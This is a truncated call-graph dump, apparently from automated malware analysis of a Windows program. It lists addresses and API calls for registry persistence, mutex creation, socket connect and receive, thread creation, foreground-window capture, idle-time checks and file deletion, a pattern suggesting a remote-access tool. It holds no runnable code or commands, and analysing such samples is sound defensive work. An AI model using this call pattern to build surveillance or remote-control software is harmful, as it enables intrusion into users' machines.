52457 401e07 52046->52457 52268 41297a RegOpenKeyExW 52047->52268 52050 40e117 52051 401e13 11 API calls 52050->52051 52052 40e121 52051->52052 52053 401e13 11 API calls 52052->52053 52053->52028 52054->51741 52055->51745 52056->51744 52057->51754 52058->51756 52059->51759 52060->51734 52061->51737 52062->51740 52063->51763 52064->51766 52065->51768 52066->51765 52068 433c81 GetStartupInfoW 52067->52068 52068->51774 52070 44ddeb 52069->52070 52071 44dde2 52069->52071 52070->51777 52074 44dcd8 48 API calls 5 library calls 52071->52074 52073->51777 52074->52070 52076 41bd32 LoadLibraryA GetProcAddress 52075->52076 52077 41bd22 GetModuleHandleA GetProcAddress 52075->52077 52078 41bd5b 32 API calls 52076->52078 52079 41bd4b LoadLibraryA GetProcAddress 52076->52079 52077->52076 52078->51782 52079->52078 52461 41a64f FindResourceA 52080->52461 52083 43a89c ___crtLCMapStringA 21 API calls 52084 40e192 ctype 52083->52084 52085 401f86 28 API calls 52084->52085 52086 40e1ad 52085->52086 52087 401eef 11 API calls 52086->52087 52088 40e1b8 52087->52088 52089 401eea 11 API calls 52088->52089 52090 40e1c1 52089->52090 52091 43a89c ___crtLCMapStringA 21 API calls 52090->52091 52092 40e1d2 ctype 52091->52092 52464 406052 52092->52464 52094 40e205 52094->51784 52115 41afe6 52095->52115 52096 41b056 52097 401eea 11 API calls 52096->52097 52098 41b088 52097->52098 52100 401eea 11 API calls 52098->52100 52099 41b058 52101 403b60 28 API calls 52099->52101 52103 41b090 52100->52103 52104 41b064 52101->52104 52105 401eea 11 API calls 52103->52105 52106 401eef 11 API calls 52104->52106 52108 40d7c6 52105->52108 52109 41b06d 52106->52109 52107 401eef 11 API calls 52107->52115 52116 40e8bd 52108->52116 52110 401eea 11 API calls 52109->52110 52112 41b075 52110->52112 52111 401eea 11 API calls 52111->52115 52471 41bfb9 28 API calls 52112->52471 52115->52096 52115->52099 52115->52107 52115->52111 52467 403b60 52115->52467 52470 41bfb9 28 API calls 52115->52470 52117 40e8ca 52116->52117 52119 40e8da 52117->52119 52488 40200a 11 API calls 52117->52488 52119->51792 52121 401d6c 52120->52121 52122 401d74 52121->52122 52489 401fff 28 API calls 52121->52489 52122->51799 52124 401d8b 52126 404ccb 52125->52126 52490 402e78 52126->52490 52128 404cee 52128->51806 52499 404bc4 52129->52499 52131 405cf4 52131->51809 52133 401efe 52132->52133 52135 401f0a 52133->52135 52508 4021b9 52133->52508 52135->51813 52138 401ec9 52136->52138 52137 401ee4 52137->51823 52138->52137 52139 402325 28 API calls 52138->52139 52139->52137 52512 401e8f 52140->52512 52142 40bee1 CreateMutexA GetLastError 52142->51839 52514 41b16b 52143->52514 52145 41a481 52518 412513 RegOpenKeyExA 52145->52518 52148 401eef 11 API calls 52149 41a4af 52148->52149 52150 401eea 11 API calls 52149->52150 52151 41a4b7 52150->52151 52152 41a50a 52151->52152 52153 412513 31 API calls 52151->52153 52152->51845 52154 41a4dd 52153->52154 52155 41a4e8 StrToIntA 52154->52155 52156 41a4ff 52155->52156 52157 41a4f6 52155->52157 52159 401eea 11 API calls 52156->52159 52523 41c112 22 API calls 52157->52523 52159->52152 52161 40698f 52160->52161 52162 4124b7 3 API calls 52161->52162 52163 406996 52162->52163 52163->51855 52163->51856 52165 41ae2c 52164->52165 52524 40b027 52165->52524 52167 41ae34 52167->51870 52169 401e27 52168->52169 52171 401e33 52169->52171 52533 402121 11 API calls 52169->52533 52171->51873 52174 402121 52172->52174 52173 402150 52173->51876 52174->52173 52534 402718 11 API calls _Deallocate 52174->52534 52177 4128c0 52176->52177 52178 406052 28 API calls 52177->52178 52179 4128d5 52178->52179 52180 401fbd 28 API calls 52179->52180 52181 4128e5 52180->52181 52182 4126d2 14 API calls 52181->52182 52183 4128ef 52182->52183 52184 401eea 11 API calls 52183->52184 52185 4128fc 52184->52185 52185->51920 52187 401f6e 52186->52187 52535 402301 52187->52535 52191 412722 52190->52191 52193 4126eb 52190->52193 52192 401eea 11 API calls 52191->52192 52194 40dd3b 52192->52194 52195 4126fd RegSetValueExA RegCloseKey 52193->52195 52194->51923 52195->52191 52197 43a610 _swprintf 52196->52197 52539 43994e 52197->52539 52199 40dd54 52199->51929 52199->51931 52201 41a747 52200->52201 52202 41a6ac GetLocalTime 52200->52202 52204 401eea 11 API calls 52201->52204 52203 404cbf 28 API calls 52202->52203 52205 41a6ee 52203->52205 52206 41a74f 52204->52206 52207 405ce6 28 API calls 52205->52207 52208 401eea 11 API calls 52206->52208 52209 41a6fa 52207->52209 52210 40ddaa 52208->52210 52567 4027cb 52209->52567 52210->51947 52212 41a706 52213 405ce6 28 API calls 52212->52213 52214 41a712 52213->52214 52570 406478 76 API calls 52214->52570 52216 41a720 52217 401eea 11 API calls 52216->52217 52218 41a72c 52217->52218 52219 401eea 11 API calls 52218->52219 52220 41a735 52219->52220 52221 401eea 11 API calls 52220->52221 52222 41a73e 52221->52222 52223 401eea 11 API calls 52222->52223 52223->52201 52225 409536 _wcslen 52224->52225 52226 409541 52225->52226 52227 409558 52225->52227 52228 40c89e 32 API calls 52226->52228 52229 40c89e 32 API calls 52227->52229 52230 409549 52228->52230 52231 409560 52229->52231 52232 401e18 11 API calls 52230->52232 52233 401e18 11 API calls 52231->52233 52234 409553 52232->52234 52235 40956e 52233->52235 52237 401e13 11 API calls 52234->52237 52236 401e13 11 API calls 52235->52236 52238 409576 52236->52238 52240 4095ad 52237->52240 52590 40856b 28 API calls 52238->52590 52575 409837 52240->52575 52241 409588 52591 4028cf 52241->52591 52245 409593 52246 401e18 11 API calls 52245->52246 52247 40959d 52246->52247 52248 401e13 11 API calls 52247->52248 52248->52234 52617 403b40 52249->52617 52253 41a80d 52254 4028cf 28 API calls 52253->52254 52255 41a817 52254->52255 52256 401e13 11 API calls 52255->52256 52257 41a820 52256->52257 52258 401e13 11 API calls 52257->52258 52259 40dfc3 52258->52259 52259->52000 52261 40e08b 52260->52261 52262 41248f RegQueryValueExA RegCloseKey 52260->52262 52261->52028 52261->52030 52262->52261 52264 4125b0 RegQueryValueExW RegCloseKey 52263->52264 52265 4125dd 52263->52265 52264->52265 52266 403b40 28 API calls 52265->52266 52267 40e0ba 52266->52267 52267->52041 52269 412992 RegDeleteValueW 52268->52269 52270 4129a6 52268->52270 52269->52270 52271 4129a2 52269->52271 52270->52050 52271->52050 52273 40cbc5 52272->52273 52274 41246e 3 API calls 52273->52274 52275 40cbcc 52274->52275 52279 40cbeb 52275->52279 52644 401602 52275->52644 52277 40cbd9 52647 4127d5 RegCreateKeyA 52277->52647 52280 413fd4 52279->52280 52281 413feb 52280->52281 52661 41aa83 52281->52661 52283 413ff6 52284 401d64 28 API calls 52283->52284 52285 41400f 52284->52285 52286 43a5f7 39 API calls 52285->52286 52287 41401c 52286->52287 52288 414021 Sleep 52287->52288 52289 41402e 52287->52289 52288->52289 52290 401f66 28 API calls 52289->52290 52291 41403d 52290->52291 52292 401d64 28 API calls 52291->52292 52293 41404b 52292->52293 52294 401fbd 28 API calls 52293->52294 52295 414053 52294->52295 52296 41afd3 28 API calls 52295->52296 52297 41405b 52296->52297 52665 404262 WSAStartup 52297->52665 52299 414065 52300 401d64 28 API calls 52299->52300 52301 41406e 52300->52301 52302 401d64 28 API calls 52301->52302 52326 4140ed 52301->52326 52303 414087 52302->52303 52304 401d64 28 API calls 52303->52304 52306 414098 52304->52306 52305 401fbd 28 API calls 52305->52326 52308 401d64 28 API calls 52306->52308 52307 41afd3 28 API calls 52307->52326 52309 4140a9 52308->52309 52312 401d64 28 API calls 52309->52312 52310 401d64 28 API calls 52310->52326 52311 4085b4 28 API calls 52311->52326 52313 4140ba 52312->52313 52315 401d64 28 API calls 52313->52315 52314 401eef 11 API calls 52314->52326 52316 4140cb 52315->52316 52317 401d64 28 API calls 52316->52317 52318 4140dd 52317->52318 52786 404101 88 API calls 52318->52786 52321 414244 WSAGetLastError 52787 41bc86 30 API calls 52321->52787 52326->52305 52326->52307 52326->52310 52326->52311 52326->52314 52326->52321 52329 404cbf 28 API calls 52326->52329 52331 401d8c 11 API calls 52326->52331 52332 414ae4 52326->52332 52334 405ce6 28 API calls 52326->52334 52336 401f66 28 API calls 52326->52336 52339 4082dc 28 API calls 52326->52339 52341 41265d 3 API calls 52326->52341 52342 412513 31 API calls 52326->52342 52343 403b40 28 API calls 52326->52343 52346 401d64 28 API calls 52326->52346 52350 41ad56 28 API calls 52326->52350 52353 41aed8 28 API calls 52326->52353 52355 40275c 28 API calls 52326->52355 52356 4027cb 28 API calls 52326->52356 52357 404468 61 API calls 52326->52357 52358 401eea 11 API calls 52326->52358 52359 401e13 11 API calls 52326->52359 52362 41a696 79 API calls 52326->52362 52363 414b22 CreateThread 52326->52363 52666 413f9a 52326->52666 52671 4041f1 52326->52671 52678 404915 52326->52678 52693 40428c connect 52326->52693 52753 41a97d 52326->52753 52756 413683 52326->52756 52759 440c61 52326->52759 52763 40cbf1 52326->52763 52769 41adfe 52326->52769 52777 41acb0 GetLastInputInfo GetTickCount 52326->52777 52778 41ac62 52326->52778 52783 40e679 GetLocaleInfoA 52326->52783 52788 404c9e 28 API calls 52326->52788 52789 4027ec 52326->52789 52793 4045d5 52326->52793 52809 4047eb WaitForSingleObject 52326->52809 52329->52326 52330 401d64 28 API calls 52330->52332 52331->52326 52332->52330 52333 43a5f7 39 API calls 52332->52333 52808 40a767 84 API calls 52332->52808 52335 414b80 Sleep 52333->52335 52334->52326 52335->52326 52336->52326 52339->52326 52341->52326 52342->52326 52343->52326 52347 4144ed GetTickCount 52346->52347 52772 41ad56 52347->52772 52350->52326 52353->52326 52355->52326 52356->52326 52357->52326 52358->52326 52359->52326 52362->52326 52363->52326 53287 419e99 105 API calls 52363->53287 52364->51800 52365->51810 52368 4085c0 52367->52368 52369 402e78 28 API calls 52368->52369 52370 4085e4 52369->52370 52370->51831 52372 4124e1 RegQueryValueExA RegCloseKey 52371->52372 52373 41250b 52371->52373 52372->52373 52373->51827 52374->51834 52375->51863 52376->51856 52377->51847 52378->51861 52380 40c8ba 52379->52380 52381 40c8da 52380->52381 52382 40c90f 52380->52382 52386 40c8d0 52380->52386 53299 41a75b 29 API calls 52381->53299 52385 41b16b 2 API calls 52382->52385 52384 40ca03 GetLongPathNameW 52388 403b40 28 API calls 52384->52388 52389 40c914 52385->52389 52386->52384 52387 40c8e3 52390 401e18 11 API calls 52387->52390 52391 40ca18 52388->52391 52392 40c918 52389->52392 52393 40c96a 52389->52393 52395 40c8ed 52390->52395 52396 403b40 28 API calls 52391->52396 52394 403b40 28 API calls 52392->52394 52397 403b40 28 API calls 52393->52397 52399 40c926 52394->52399 52401 401e13 11 API calls 52395->52401 52400 40ca27 52396->52400 52398 40c978 52397->52398 52405 403b40 28 API calls 52398->52405 52406 403b40 28 API calls 52399->52406 53288 40cc37 52400->53288 52401->52386 52408 40c98e 52405->52408 52409 40c93c 52406->52409 52407 40ca45 52410 402860 28 API calls 52407->52410 52411 402860 28 API calls 52408->52411 52412 402860 28 API calls 52409->52412 52413 40ca4f 52410->52413 52414 40c999 52411->52414 52415 40c947 52412->52415 52416 401e13 11 API calls 52413->52416 52417 401e18 11 API calls 52414->52417 52418 401e18 11 API calls 52415->52418 52419 40ca59 52416->52419 52420 40c9a4 52417->52420 52421 40c952 52418->52421 52422 401e13 11 API calls 52419->52422 52423 401e13 11 API calls 52420->52423 52424 401e13 11 API calls 52421->52424 52425 40ca62 52422->52425 52426 40c9ad 52423->52426 52427 40c95b 52424->52427 52428 401e13 11 API calls 52425->52428 52429 401e13 11 API calls 52426->52429 52430 401e13 11 API calls 52427->52430 52431 40ca6b 52428->52431 52429->52395 52430->52395 52432 401e13 11 API calls 52431->52432 52433 40ca74 52432->52433 52434 401e13 11 API calls 52433->52434 52435 40ca7d 52434->52435 52435->51909 52436->51921 52437->51943 52439 412683 RegQueryValueExA RegCloseKey 52438->52439 52440 4126a7 52438->52440 52439->52440 52440->51902 52441->51935 52442->51972 52443->51981 52445 401f66 28 API calls 52444->52445 52446 40c86b 52445->52446 52447 41ae18 28 API calls 52446->52447 52448 40c876 52447->52448 52449 40c89e 32 API calls 52448->52449 52450 40c887 52449->52450 52451 401e13 11 API calls 52450->52451 52452 40c890 52451->52452 52453 401eea 11 API calls 52452->52453 52454 40c898 52453->52454 52454->52008 52455->51993 52456->52026 52458 401e0c 52457->52458 52459->51852 52462 40e183 52461->52462 52463 41a66c LoadResource LockResource SizeofResource 52461->52463 52462->52083 52463->52462 52465 401f86 28 API calls 52464->52465 52466 406066 52465->52466 52466->52094 52472 403c30 52467->52472 52470->52115 52471->52096 52473 403c39 52472->52473 52476 403c59 52473->52476 52477 403c68 52476->52477 52482 4032a4 52477->52482 52479 403c74 52480 402325 28 API calls 52479->52480 52481 403b73 52480->52481 52481->52115 52483 4032b0 52482->52483 52484 4032ad 52482->52484 52487 4032b6 22 API calls 52483->52487 52484->52479 52488->52119 52489->52124 52491 402e85 52490->52491 52492 402e98 52491->52492 52494 402ea9 52491->52494 52495 402eae 52491->52495 52497 403445 28 API calls 52492->52497 52494->52128 52495->52494 52498 40225b 11 API calls 52495->52498 52497->52494 52498->52494 52500 404bd0 52499->52500 52503 40245c 52500->52503 52502 404be4 52502->52131 52504 402469 52503->52504 52506 402478 52504->52506 52507 402ad3 28 API calls 52504->52507 52506->52502 52507->52506 52510 4021c6 52508->52510 52509 4021e8 52509->52135 52510->52509 52511 40262e 11 API calls 52510->52511 52511->52509 52513 401e94 52512->52513 52515 41b193 52514->52515 52516 41b178 GetCurrentProcess IsWow64Process 52514->52516 52515->52145 52516->52515 52517 41b18f 52516->52517 52517->52145 52519 412541 RegQueryValueExA RegCloseKey 52518->52519 52520 412569 52518->52520 52519->52520 52521 401f66 28 API calls 52520->52521 52522 41257e 52521->52522 52522->52148 52523->52156 52525 40b02f 52524->52525 52528 40b04b 52525->52528 52527 40b045 52527->52167 52529 40b055 52528->52529 52531 40b060 52529->52531 52532 40b138 28 API calls 52529->52532 52531->52527 52532->52531 52533->52171 52534->52173 52536 40230d 52535->52536 52537 402325 28 API calls 52536->52537 52538 401f80 52537->52538 52538->51915 52555 43a555 52539->52555 52541 43999b 52561 4392ee 35 API calls 3 library calls 52541->52561 52543 439960 52543->52541 52544 439975 52543->52544 52554 43997a __cftof 52543->52554 52560 445364 20 API calls __dosmaperr 52544->52560 52547 4399a7 52548 4399d6 52547->52548 52562 43a59a 39 API calls __Toupper 52547->52562 52551 439a42 52548->52551 52563 43a501 20 API calls 2 library calls 52548->52563 52564 43a501 20 API calls 2 library calls 52551->52564 52552 439b09 _swprintf 52552->52554 52565 445364 20 API calls __dosmaperr 52552->52565 52554->52199 52556 43a55a 52555->52556 52557 43a56d 52555->52557 52566 445364 20 API calls __dosmaperr 52556->52566 52557->52543 52559 43a55f __cftof 52559->52543 52560->52554 52561->52547 52562->52547 52563->52551 52564->52552 52565->52554 52566->52559 52571 401e9b 52567->52571 52569 4027d9 52569->52212 52570->52216 52572 401ea7 52571->52572 52573 40245c 28 API calls 52572->52573 52574 401eb9 52573->52574 52574->52569 52576 409855 52575->52576 52577 4124b7 3 API calls 52576->52577 52578 40985c 52577->52578 52579 409870 52578->52579 52580 40988a 52578->52580 52581 4095cf 52579->52581 52582 409875 52579->52582 52583 4082dc 28 API calls 52580->52583 52581->51966 52594 4082dc 52582->52594 52585 409898 52583->52585 52599 4098a5 85 API calls 52585->52599 52589 409888 52589->52581 52590->52241 52608 402d8b 52591->52608 52593 4028dd 52593->52245 52595 4082eb 52594->52595 52600 408431 52595->52600 52597 408309 52598 409959 29 API calls 52597->52598 52598->52589 52605 40999f 130 API calls 52598->52605 52599->52581 52606 4099b5 53 API calls 52599->52606 52607 4099a9 125 API calls 52599->52607 52601 40843d 52600->52601 52603 40845b 52601->52603 52604 402f0d 28 API calls 52601->52604 52603->52597 52604->52603 52609 402d97 52608->52609 52612 4030f7 52609->52612 52611 402dab 52611->52593 52613 403101 52612->52613 52615 403115 52613->52615 52616 4036c2 28 API calls 52613->52616 52615->52611 52616->52615 52618 403b48 52617->52618 52624 403b7a 52618->52624 52621 403cbb 52633 403dc2 52621->52633 52623 403cc9 52623->52253 52625 403b86 52624->52625 52628 403b9e 52625->52628 52627 403b5a 52627->52621 52629 403ba8 52628->52629 52631 403bb3 52629->52631 52632 403cfd 28 API calls 52629->52632 52631->52627 52632->52631 52634 403dce 52633->52634 52637 402ffd 52634->52637 52636 403de3 52636->52623 52638 40300e 52637->52638 52639 4032a4 22 API calls 52638->52639 52640 40301a 52639->52640 52642 40302e 52640->52642 52643 4035e8 28 API calls 52640->52643 52642->52636 52643->52642 52650 4395ca 52644->52650 52648 4127ed RegSetValueExA RegCloseKey 52647->52648 52649 412814 52647->52649 52648->52649 52649->52279 52653 43954b 52650->52653 52652 401608 52652->52277 52654 43955a 52653->52654 52655 43956e 52653->52655 52659 445364 20 API calls __dosmaperr 52654->52659 52658 43955f __alldvrm __cftof 52655->52658 52660 447611 11 API calls 2 library calls 52655->52660 52658->52652 52659->52658 52660->52658 52664 41aac9 ctype ___scrt_fastfail 52661->52664 52662 401f66 28 API calls 52663 41ab3e 52662->52663 52663->52283 52664->52662 52665->52299 52667 413fb3 getaddrinfo WSASetLastError 52666->52667 52668 413fa9 52666->52668 52667->52326 52822 413e37 29 API calls ___std_exception_copy 52668->52822 52670 413fae 52670->52667 52672 404206 socket 52671->52672 52673 4041fd 52671->52673 52675 404220 52672->52675 52676 404224 CreateEventW 52672->52676 52823 404262 WSAStartup 52673->52823 52675->52326 52676->52326 52677 404202 52677->52672 52677->52675 52679 4049b1 52678->52679 52680 40492a 52678->52680 52679->52326 52681 404933 52680->52681 52682 404987 CreateEventA CreateThread 52680->52682 52683 404942 GetLocalTime 52680->52683 52681->52682 52682->52679 52825 404b1d 52682->52825 52684 41ad56 28 API calls 52683->52684 52685 40495b 52684->52685 52824 404c9e 28 API calls 52685->52824 52687 404968 52688 401f66 28 API calls 52687->52688 52689 404977 52688->52689 52690 41a696 79 API calls 52689->52690 52691 40497c 52690->52691 52692 401eea 11 API calls 52691->52692 52692->52682 52694 4043e1 52693->52694 52695 4042b3 52693->52695 52696 4043e7 WSAGetLastError 52694->52696 52697 404343 52694->52697 52695->52697 52698 4042e8 52695->52698 52700 404cbf 28 API calls 52695->52700 52696->52697 52699 4043f7 52696->52699 52697->52326 52829 420161 27 API calls 52698->52829 52701 4042f7 52699->52701 52702 4043fc 52699->52702 52704 4042d4 52700->52704 52707 401f66 28 API calls 52701->52707 52834 41bc86 30 API calls 52702->52834 52708 401f66 28 API calls 52704->52708 52706 4042f0 52706->52701 52710 404306 52706->52710 52711 404448 52707->52711 52712 4042e3 52708->52712 52709 40440b 52835 404c9e 28 API calls 52709->52835 52719 404315 52710->52719 52720 40434c 52710->52720 52714 401f66 28 API calls 52711->52714 52715 41a696 79 API calls 52712->52715 52717 404457 52714->52717 52715->52698 52716 404418 52718 401f66 28 API calls 52716->52718 52721 41a696 79 API calls 52717->52721 52722 404427 52718->52722 52724 401f66 28 API calls 52719->52724 52831 420f44 54 API calls 52720->52831 52721->52697 52726 41a696 79 API calls 52722->52726 52725 404324 52724->52725 52728 401f66 28 API calls 52725->52728 52729 40442c 52726->52729 52727 404354 52730 404389 52727->52730 52731 404359 52727->52731 52732 404333 52728->52732 52734 401eea 11 API calls 52729->52734 52833 4202fa 28 API calls 52730->52833 52735 401f66 28 API calls 52731->52735 52736 41a696 79 API calls 52732->52736 52734->52697 52738 404368 52735->52738 52739 404338 52736->52739 52737 404391 52740 4043be CreateEventW CreateEventW 52737->52740 52742 401f66 28 API calls 52737->52742 52741 401f66 28 API calls 52738->52741 52830 41dc25 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 52739->52830 52740->52697 52743 404377 52741->52743 52746 4043a7 52742->52746 52744 41a696 79 API calls 52743->52744 52747 40437c 52744->52747 52748 401f66 28 API calls 52746->52748 52832 4205a2 52 API calls 52747->52832 52750 4043b6 52748->52750 52751 41a696 79 API calls 52750->52751 52752 4043bb 52751->52752 52752->52740 52836 41a955 GlobalMemoryStatusEx 52753->52836 52755 41a992 52755->52326 52837 413646 52756->52837 52760 440c6d 52759->52760 52875 440a5d 52760->52875 52762 440c8e 52762->52326 52764 40cc0d 52763->52764 52765 41246e 3 API calls 52764->52765 52767 40cc14 52765->52767 52766 40cc2c 52766->52326 52767->52766 52768 4124b7 3 API calls 52767->52768 52768->52766 52770 401f86 28 API calls 52769->52770 52771 41ae13 52770->52771 52771->52326 52773 440c61 20 API calls 52772->52773 52774 41ad77 52773->52774 52775 401f66 28 API calls 52774->52775 52776 41ad85 52775->52776 52776->52326 52777->52326 52779 436060 ___scrt_fastfail 52778->52779 52780 41ac81 GetForegroundWindow GetWindowTextW 52779->52780 52781 403b40 28 API calls 52780->52781 52782 41acab 52781->52782 52782->52326 52784 401f66 28 API calls 52783->52784 52785 40e69e 52784->52785 52785->52326 52786->52326 52787->52326 52788->52326 52790 4027f8 52789->52790 52791 402e78 28 API calls 52790->52791 52792 402814 52791->52792 52792->52326 52796 4045ec 52793->52796 52794 43a89c ___crtLCMapStringA 21 API calls 52794->52796 52796->52794 52797 401f86 28 API calls 52796->52797 52798 404666 52796->52798 52799 401eef 11 API calls 52796->52799 52802 401eea 11 API calls 52796->52802 52880 40455b 52796->52880 52886 404688 52796->52886 52797->52796 52800 4047eb 98 API calls 52798->52800 52799->52796 52801 40466d 52800->52801 52803 401eea 11 API calls 52801->52803 52802->52796 52804 404676 52803->52804 52805 401eea 11 API calls 52804->52805 52806 40467f 52805->52806 52806->52326 52808->52326 52810 404805 SetEvent CloseHandle 52809->52810 52811 40481c closesocket 52809->52811 52812 40489c 52810->52812 52813 404829 52811->52813 52812->52326 52814 40483f 52813->52814 53284 404ab1 83 API calls 52813->53284 52816 404851 WaitForSingleObject 52814->52816 52817 404892 SetEvent CloseHandle 52814->52817 53285 41dc25 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 52816->53285 52817->52812 52819 404860 SetEvent WaitForSingleObject 53286 41dc25 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 52819->53286 52821 404878 SetEvent CloseHandle CloseHandle 52821->52817 52822->52670 52823->52677 52824->52687 52828 404b29 101 API calls 52825->52828 52827 404b26 52828->52827 52829->52706 52830->52697 52831->52727 52832->52739 52833->52737 52834->52709 52835->52716 52836->52755 52840 413619 52837->52840 52841 41362e ___scrt_initialize_default_local_stdio_options 52840->52841 52844 43e2ed 52841->52844 52847 43b040 52844->52847 52848 43b080 52847->52848 52849 43b068 52847->52849 52848->52849 52850 43b088 52848->52850 52869 445364 20 API calls __dosmaperr 52849->52869 52870 4392ee 35 API calls 3 library calls 52850->52870 52852 43b06d __cftof 52862 433d3c 52852->52862 52854 43b098 52871 43b7c6 20 API calls 2 library calls 52854->52871 52857 41363c 52857->52326 52858 43b110 52872 43be34 50 API calls 3 library calls 52858->52872 52861 43b11b 52873 43b830 20 API calls _free 52861->52873 52863 433d47 IsProcessorFeaturePresent 52862->52863 52864 433d45 52862->52864 52866 4341b4 52863->52866 52864->52857 52874 434178 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 52866->52874 52868 434297 52868->52857 52869->52852 52870->52854 52871->52858 52872->52861 52873->52852 52874->52868 52876 440a74 52875->52876 52878 440aab __cftof 52876->52878 52879 445364 20 API calls __dosmaperr 52876->52879 52878->52762 52879->52878 52881 404592 recv 52880->52881 52882 404565 WaitForSingleObject 52880->52882 52884 4045a5 52881->52884 52899 420566 54 API calls 52882->52899 52884->52796 52885 404581 SetEvent 52885->52884 52895 4046a3 52886->52895 52887 4047d8 52888 401eea 11 API calls 52887->52888 52889 4047e1 52888->52889 52889->52796 52890 403b60 28 API calls 52890->52895 52891 401eef 11 API calls 52891->52895 52892 401fbd 28 API calls 52892->52895 52893 401ebd 28 API calls 52894 404772 CreateEventA CreateThread WaitForSingleObject CloseHandle 52893->52894 52894->52895 53199 414b9b 52894->53199 52895->52887 52895->52890 52895->52891 52895->52892 52895->52893 52896 401eea 11 API calls 52895->52896 52898 402654 11 API calls 52895->52898 52900 411b60 52895->52900 52896->52895 52898->52895 52899->52885 52901 411b72 52900->52901 52902 403b60 28 API calls 52901->52902 52903 411b85 52902->52903 52904 401fbd 28 API calls 52903->52904 52905 411b94 52904->52905 52906 401fbd 28 API calls 52905->52906 52907 411ba3 52906->52907 52908 41afd3 28 API calls 52907->52908 52910 411bac 52908->52910 52909 411c60 52912 401d8c 11 API calls 52909->52912 52910->52909 52911 401d64 28 API calls 52910->52911 52914 411bc8 52911->52914 52913 411c69 52912->52913 52915 401eea 11 API calls 52913->52915 52916 401fbd 28 API calls 52914->52916 52917 411c72 52915->52917 52918 411bd0 52916->52918 52919 401eea 11 API calls 52917->52919 52920 401d64 28 API calls 52918->52920 52921 411c7a 52919->52921 52922 411be0 52920->52922 52921->52895 52923 401fbd 28 API calls 52922->52923 52924 411be8 52923->52924 52925 401d64 28 API calls 52924->52925 52926 411bf8 52925->52926 52927 401fbd 28 API calls 52926->52927 52928 411c00 52927->52928 52929 401d64 28 API calls 52928->52929 52930 411c10 52929->52930 52931 401fbd 28 API calls 52930->52931 52932 411c18 52931->52932 52933 401d64 28 API calls 52932->52933 52934 411c28 52933->52934 52935 401fbd 28 API calls 52934->52935 52936 411c30 52935->52936 52937 401d64 28 API calls 52936->52937 52938 411c43 52937->52938 52939 401fbd 28 API calls 52938->52939 52940 411c4b 52939->52940 52944 411c81 GetModuleFileNameW 52940->52944 52943 4047eb 98 API calls 52943->52909 52963 411cac 52944->52963 52945 40c854 32 API calls 52945->52963 52946 401eea 11 API calls 52946->52963 52947 41ab48 42 API calls 52947->52963 52948 403b40 28 API calls 52948->52963 52949 403cbb 28 API calls 52949->52963 52950 403cdc 28 API calls 52950->52963 52951 411dea Sleep 52951->52963 52952 4028cf 28 API calls 52952->52963 52953 4176b6 31 API calls 52953->52963 52954 411e8c Sleep 52954->52963 52955 401e13 11 API calls 52955->52963 52956 411f2e Sleep 52956->52963 52957 411f90 DeleteFileW 52957->52963 52958 41b62a 32 API calls 52958->52963 52959 411fc7 DeleteFileW 52959->52963 52960 412019 Sleep 52960->52963 52961 412003 DeleteFileW 52961->52963 52962 412092 52964 401e13 11 API calls 52962->52964 52963->52945 52963->52946 52963->52947 52963->52948 52963->52949 52963->52950 52963->52951 52963->52952 52963->52953 52963->52954 52963->52955 52963->52956 52963->52957 52963->52958 52963->52959 52963->52960 52963->52961 52963->52962 52970 41205e Sleep 52963->52970 52965 41209e 52964->52965 52966 401e13 11 API calls 52965->52966 52967 4120aa 52966->52967 52968 401e13 11 API calls 52967->52968 52969 4120b6 52968->52969 52971 40b027 28 API calls 52969->52971 52972 401e13 11 API calls 52970->52972 52973 4120c9 52971->52973 52977 41206e 52972->52977 52974 401fbd 28 API calls 52973->52974 52976 4120e9 52974->52976 52975 401e13 11 API calls 52975->52977 53086 4123f7 52976->53086 52977->52963 52977->52975 52978 412090 52977->52978 52978->52969 52981 401e13 11 API calls 52982 412100 52981->52982 52983 412125 52982->52983 52984 412274 52982->52984 53098 41aed8 52983->53098 52985 41aed8 28 API calls 52984->52985 52987 41227d 52985->52987 52989 4027ec 28 API calls 52987->52989 52991 4122b2 52989->52991 52990 41ad56 28 API calls 52992 412146 52990->52992 52993 4027cb 28 API calls 52991->52993 52994 4027ec 28 API calls 52992->52994 52995 4122c1 52993->52995 52996 412176 52994->52996 52997 4027cb 28 API calls 52995->52997 52998 4027cb 28 API calls 52996->52998 52999 4122cd 52997->52999 53000 412185 52998->53000 53001 4027cb 28 API calls 52999->53001 53002 4027cb 28 API calls 53000->53002 53003 4122dc 53001->53003 53004 412194 53002->53004 53005 4027cb 28 API calls 53003->53005 53006 4027cb 28 API calls 53004->53006 53008 4122eb 53005->53008 53007 4121a3 53006->53007 53010 4027cb 28 API calls 53007->53010 53009 4027cb 28 API calls 53008->53009 53011 4122fa 53009->53011 53012 4121b2 53010->53012 53013 4027cb 28 API calls 53011->53013 53014 4027cb 28 API calls 53012->53014 53015 412309 53013->53015 53016 4121be 53014->53016 53104 40275c 28 API calls 53015->53104 53018 4027cb 28 API calls 53016->53018 53020 4121ca 53018->53020 53019 412313 53021 404468 61 API calls 53019->53021 53102 40275c 28 API calls 53020->53102 53023 412320 53021->53023 53025 401eea 11 API calls 53023->53025 53024 4121d9 53026 4027cb 28 API calls 53024->53026 53027 41232c 53025->53027 53028 4121e5 53026->53028 53029 401eea 11 API calls 53027->53029 53103 40275c 28 API calls 53028->53103 53031 412338 53029->53031 53033 401eea 11 API calls 53031->53033 53032 4121ef 53034 404468 61 API calls 53032->53034 53035 412344 53033->53035 53036 4121fc 53034->53036 53037 401eea 11 API calls 53035->53037 53038 401eea 11 API calls 53036->53038 53040 412350 53037->53040 53039 412205 53038->53039 53042 401eea 11 API calls 53039->53042 53041 401eea 11 API calls 53040->53041 53043 412359 53041->53043 53044 41220e 53042->53044 53045 401eea 11 API calls 53043->53045 53046 401eea 11 API calls 53044->53046 53047 412362 53045->53047 53048 412217 53046->53048 53049 401eea 11 API calls 53047->53049 53050 401eea 11 API calls 53048->53050 53051 412268 53049->53051 53052 412220 53050->53052 53054 401eea 11 API calls 53051->53054 53053 401eea 11 API calls 53052->53053 53055 41222c 53053->53055 53056 412374 53054->53056 53057 401eea 11 API calls 53055->53057 53058 401e13 11 API calls 53056->53058 53059 412238 53057->53059 53060 412380 53058->53060 53061 401eea 11 API calls 53059->53061 53062 401eea 11 API calls 53060->53062 53063 412244 53061->53063 53064 41238c 53062->53064 53065 401eea 11 API calls 53063->53065 53066 401eea 11 API calls 53064->53066 53067 412250 53065->53067 53068 412398 53066->53068 53069 